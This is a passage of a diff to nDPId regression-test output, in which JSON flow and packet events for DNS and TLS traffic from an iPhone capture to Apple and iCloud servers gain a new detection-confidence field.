+00768{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":261,"source":"iphone.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454599073,"flow_last_seen":1582454599105,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1582454599105,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52031,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"gsa.apple.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.137.166.35"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":262,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599225,"flow_last_seen":1582454599225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1582454599225,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50584,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":262,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1582454599225,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1582454599225,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGtbvAqAIREfiwS8WYAbuypew6AAAAALDC\/\/9PDwAAAgQFtAEDAwcBAQgKEd\/qGwAAAAAEAgAA"}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":266,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1582454599259,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1582454599259,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAC4GB8AR+LBLwKgCEQG7xZj0WnUXsqXsO6BScSAj8wAAAgQFrAEBCApbEwn1Ed\/qGwEDAwU="}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1582454599261,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1582454599261,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGtcfAqAIREfiwS8WYAbuypew79Fp1GIAQBAu8hwAAAQEIChHf6p1bEwn1"}
-00880{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":268,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454599225,"flow_last_seen":1582454599261,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1582454599261,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50584,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00938{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":270,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454599225,"flow_last_seen":1582454599295,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1582454599295,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50584,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-01311{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":272,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454599225,"flow_last_seen":1582454599297,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4837,"flow_avg_l4_payload_len":604,"midstream":0,"ts_msec":1582454599297,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50584,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","server_names":"gateway-india.icloud.com,gateway-carry.icloud.com,gateway.icloud.com,gateway-australia.icloud.com,gateway-sandbox.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=gateway.icloud.com, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"D2:DA:1C:68:0C:91:A7:DB:BA:B2:2D:29:06:DB:57:42:10:3D:3A:FE"}}
+00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":268,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454599225,"flow_last_seen":1582454599261,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1582454599261,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50584,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00964{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":270,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454599225,"flow_last_seen":1582454599295,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1582454599295,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50584,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01337{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":272,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454599225,"flow_last_seen":1582454599297,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4837,"flow_avg_l4_payload_len":604,"midstream":0,"ts_msec":1582454599297,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50584,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","server_names":"gateway-india.icloud.com,gateway-carry.icloud.com,gateway.icloud.com,gateway-australia.icloud.com,gateway-sandbox.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=gateway.icloud.com, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"D2:DA:1C:68:0C:91:A7:DB:BA:B2:2D:29:06:DB:57:42:10:3D:3A:FE"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":274,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599396,"flow_last_seen":1582454599396,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1582454599396,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.137.166.35","src_port":50585,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":274,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1582454599396,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1582454599396,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGwFLAqAIREYmmI8WZAbu9h96xAAAAALDC\/\/9bXgAAAgQFtAEDAwcBAQgKEd\/rCQAAAAAEAgAA"}
 00516{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":275,"source":"iphone.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1582454599396,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":108,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":108,"pkt_l4_len":74,"ts_msec":1582454599396,"pkt":"AQBeAAD7xGGLNYKpCABFAABeopUAAP8RdUTAqAIR4AAA+xTpFOkASvALAAAAAAABAAAAAAABCF9ob21la2l0BF90Y3AFbG9jYWwAAAwAAQAAKQWgAAARlAASAAQADgAA5mGLNYKpxGGLNYKp"}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"iphone.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1582454599568,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":70,"pkt_l4_len":16,"ts_msec":1582454599568,"pkt":"MzMAAAACxGGLNYKpht1gCzl3ABA6\/\/6AAAAAAAAACCM\/F4KYopz\/AgAAAAAAAAAAAAAAAAAChQA9fgAAAAABAcRhizWCqQ=="}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1582454599585,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1582454599585,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAACsGFVcRiaYjwKgCEQG7xZn\/hRwvvYfesqBS\/\/9NtwAAAgQFrAQCCArKEDlZEd\/rCQEDAws="}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":303,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1582454599602,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1582454599602,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGwF7AqAIREYmmI8WZAbu9h96y\/4UcMIAQBAt3qQAAAQEIChHf7BTKEDlZ"}
-00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":304,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454599396,"flow_last_seen":1582454599603,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1582454599603,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.137.166.35","src_port":50585,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gsa.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00886{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":304,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454599396,"flow_last_seen":1582454599603,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1582454599603,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.137.166.35","src_port":50585,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gsa.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":306,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599740,"flow_last_seen":1582454599740,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1582454599740,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50586,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":306,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1582454599740,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1582454599740,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGtbvAqAIREfiwS8WaAbsCzUbDAAAAALDC\/\/+ibQAAAgQFtAEDAwcBAQgKEd\/sCwAAAAAEAgAA"}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":318,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1582454599774,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1582454599774,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAC0GCMAR+LBLwKgCEQG7xZq3FAeKAs1GxKBScSAgIAAAAgQFrAEBCApbEwv6Ed\/sCwEDAwU="}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":322,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1582454599776,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1582454599776,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGtcfAqAIREfiwS8WaAbsCzUbEtxQHi4AQBAu4qgAAAQEIChHf7JdbEwv6"}
-00880{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":323,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454599740,"flow_last_seen":1582454599776,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1582454599776,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50586,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00916{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":325,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454599396,"flow_last_seen":1582454599793,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1582454599793,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.137.166.35","src_port":50585,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gsa.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"c4b2785a87896e19d37eee932070cb22","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-01199{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":327,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454599396,"flow_last_seen":1582454599794,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4308,"flow_avg_l4_payload_len":538,"midstream":0,"ts_msec":1582454599794,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.137.166.35","src_port":50585,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gsa.apple.com","server_names":"gsas.apple.com,gsa.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"c4b2785a87896e19d37eee932070cb22","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Apple Server Authentication CA, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=gsa.apple.com, O=Apple Inc., ST=California, C=US","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"D4:EF:5E:AD:7F:D5:13:5B:9F:B2:B9:84:19:75:BB:ED:53:FB:18:D6"}}
-00938{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":330,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454599740,"flow_last_seen":1582454599811,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1582454599811,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50586,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-01311{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":332,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454599740,"flow_last_seen":1582454599814,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4837,"flow_avg_l4_payload_len":604,"midstream":0,"ts_msec":1582454599814,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50586,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","server_names":"gateway-india.icloud.com,gateway-carry.icloud.com,gateway.icloud.com,gateway-australia.icloud.com,gateway-sandbox.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=gateway.icloud.com, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"D2:DA:1C:68:0C:91:A7:DB:BA:B2:2D:29:06:DB:57:42:10:3D:3A:FE"}}
+00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":323,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454599740,"flow_last_seen":1582454599776,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1582454599776,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50586,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00942{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":325,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454599396,"flow_last_seen":1582454599793,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1582454599793,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.137.166.35","src_port":50585,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gsa.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"c4b2785a87896e19d37eee932070cb22","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01225{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":327,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454599396,"flow_last_seen":1582454599794,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4308,"flow_avg_l4_payload_len":538,"midstream":0,"ts_msec":1582454599794,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.137.166.35","src_port":50585,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gsa.apple.com","server_names":"gsas.apple.com,gsa.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"c4b2785a87896e19d37eee932070cb22","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Apple Server Authentication CA, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=gsa.apple.com, O=Apple Inc., ST=California, C=US","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"D4:EF:5E:AD:7F:D5:13:5B:9F:B2:B9:84:19:75:BB:ED:53:FB:18:D6"}}
+00964{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":330,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454599740,"flow_last_seen":1582454599811,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1582454599811,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50586,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
